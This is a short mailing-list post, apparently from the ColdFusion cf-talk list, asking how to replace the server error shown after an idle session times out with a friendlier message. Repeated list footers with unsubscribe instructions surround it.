 how do i get around the problem of a cf server error appearing when there
 has been a session time out due to a member being idle

 what suggestions do you have so that an appropriate message appears rather
 than the cf error message due to a time out ??

 Kind Regards

 Claude Raiola
 E-Mail: [EMAIL PROTECTED]
 Website: www.internetgoldcoastproperties.com.au


 --
 
 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit
 http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
 send a message to [EMAIL PROTECTED] with
 'unsubscribe' in the
 body.


 
 Get free email and a permanent address at http://www.netaddress.com/?N=1
 --
 
 Archives: http://www.eGroups.com/list/cf-talk
 To Unsubscribe visit
 http://www.houseoffusion.com/index.cfm?sidebar=stsbody=sts/cf_tal
k or send a message to [EMAIL PROTECTED] with 'unsubscribe'
in the body.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



<    1   2   3   4   5   6